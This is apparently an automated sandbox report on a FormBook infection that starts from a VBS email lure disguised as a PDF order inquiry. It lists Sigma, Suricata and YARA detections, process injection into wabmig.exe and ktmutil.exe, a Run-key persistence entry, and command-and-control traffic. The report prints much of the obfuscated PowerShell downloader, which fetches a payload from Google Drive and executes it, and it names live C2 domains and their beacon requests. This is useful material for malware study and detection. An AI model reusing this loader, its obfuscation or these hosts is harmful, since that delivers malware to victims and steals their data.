          Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" , CommandLine: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe, NewProcessName: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe, OriginalFileName: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wabmig.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wabmig.exe, ParentProcessId: 7172, ParentProcessName: wabmig.exe, ProcessCommandLine: "C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe" , ProcessId: 824, ProcessName: osqpHpjBCXXA.exe
          Sigma detected: CurrentVersion Autorun Keys Modification
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\windows mail\wabmig.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\ktmutil.exe, ProcessId: 648, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KB60QNXX7JN
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", CommandLine|base64offset|contains: "z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs", ProcessId: 7404, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModcGeor .eoBorrta hPioiGlanUnau Cas En2R p1 Op8Br.. ,uDElsoComw,

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-16T14:45:47.825717+020028032702Potentially Bad Traffic192.168.2.449739142.250.185.110443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for domain / URL
          Source: www.hsck520.comVirustotal: Detection: 5%Perma Link
          Source: www.amkmos.onlineVirustotal: Detection: 10%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbu] source: powershell.exe, 00000006.00000002.2221760380.00000000075A5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wabmig.pdbGCTL source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbL/d source: powershell.exe, 00000001.00000002.2402315774.000001F2B7850000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wabmig.pdb source: ktmutil.exe, 0000000C.00000002.2980525001.0000000000813000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: osqpHpjBCXXA.exe, 0000000B.00000002.2979840816.00000000009CE000.00000002.00000001.01000000.00000008.sdmp
          Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000001.00000002.2399198190.000001F2B75CB000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wabmig.exe, 0000000A.00000003.2332183560.00000000215EF000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2334544648.000000002179A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000003.2431520308.0000000002C26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h.B source: powershell.exe, 00000001.00000002.2402315774.000001F2B789F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wabmig.exe, wabmig.exe, 0000000A.00000003.2332183560.00000000215EF000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000003.2334544648.000000002179A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 0000000C.00000003.2431520308.0000000002C26000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2982129519.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: ktmutil.pdbGCTL source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000002.2980927526.0000000001288000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ktmutil.pdb source: wabmig.exe, 0000000A.00000002.2434687494.0000000005E5F000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000A.00000002.2434687494.0000000005E71000.00000004.00000020.00020000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000002.2980927526.0000000001288000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000001.00000002.2400865654.000001F2B7654000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003AC270 FindFirstFileW,FindNextFileW,FindClose,12_2_003AC270

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then xor eax, eax12_2_00399B00
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then mov ebx, 00000004h12_2_02C204E0
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49739 -> 142.250.185.110:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn HTTP/1.1Host: drive.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /download?id=1-M5LzLlVhgm921Zwlu8IQ3wKOuC8U8qn&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1PuWtbu-uhB53y-WA99iWotEHLsyMU2wV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2+KT2FsHNx9t47tozcKf+wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z+82aLMtRHRH5540be2ISaKbwCt+kNSrDfOHoX6kdHk1g= HTTP/1.1Host: www.freel2charger.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
          Source: global trafficHTTP traffic detected: GET /alsy/?7JP=sFIZ3H46VDCFAxrc+oKxfEwJKwyB2GbujsubN54cMZ3ZKYO7DzbSb11HbeOZoAajDYdufGPs+3X3MuSwdoj2w4DFbeRQQ/e5pVDNloXMU4Bz0KAn7Ijiyww=&yD74=KV788dEH1 HTTP/1.1Host: www.lotlizard.hostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
          Source: global trafficDNS traffic detected: DNS query: drive.google.com
          Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global trafficDNS traffic detected: DNS query: www.freel2charger.com
          Source: global trafficDNS traffic detected: DNS query: www.lotlizard.host
          Source: global trafficDNS traffic detected: DNS query: www.amkmos.online
          Source: global trafficDNS traffic detected: DNS query: www.hsck520.com
          Source: unknownHTTP traffic detected: POST /alsy/ HTTP/1.1Host: www.lotlizard.hostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,enConnection: closeCache-Control: no-cacheContent-Length: 200Content-Type: application/x-www-form-urlencodedOrigin: http://www.lotlizard.hostReferer: http://www.lotlizard.host/alsy/User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36Data Raw: 37 4a 50 3d 68 48 67 35 30 33 4d 2f 53 6a 6e 56 4c 52 6e 5a 2b 61 32 67 52 6c 49 6d 47 53 75 7a 6f 6d 36 58 6e 71 47 34 4c 6f 5a 75 55 71 2f 63 54 49 6e 52 45 52 7a 6a 61 6d 6c 6a 59 39 4c 76 33 32 32 6b 43 63 68 50 42 56 69 2b 36 55 37 7a 4c 39 4b 34 42 4d 72 49 2b 39 36 65 4a 73 52 68 65 72 71 33 67 79 79 49 72 66 4c 51 52 35 64 4c 67 49 63 6c 6b 70 48 42 79 43 47 58 52 62 57 57 53 31 66 67 45 6e 70 67 39 31 32 67 4f 78 58 39 6b 39 4e 4f 4f 69 57 7a 65 62 45 33 77 2b 6d 67 64 6d 31 56 55 55 66 31 4f 2b 6b 4c 59 39 55 66 6c 55 41 70 76 76 6b 39 69 2b 35 34 31 6a 55 79 51 6c 65 37 2b 41 3d 3d Data Ascii: 7JP=hHg503M/SjnVLRnZ+a2gRlImGSuzom6XnqG4LoZuUq/cTInRERzjamljY9Lv322kCchPBVi+6U7zL9K4BMrI+96eJsRherq3gyyIrfLQR5dLgIclkpHByCGXRbWWS1fgEnpg912gOxX9k9NOOiWzebE3w+mgdm1VUUf1O+kLY9UflUApvvk9i+541jUyQle7+A==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Sep 2024 12:46:42 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Sep 2024 12:46:44 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 16 Sep 2024 12:46:47 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 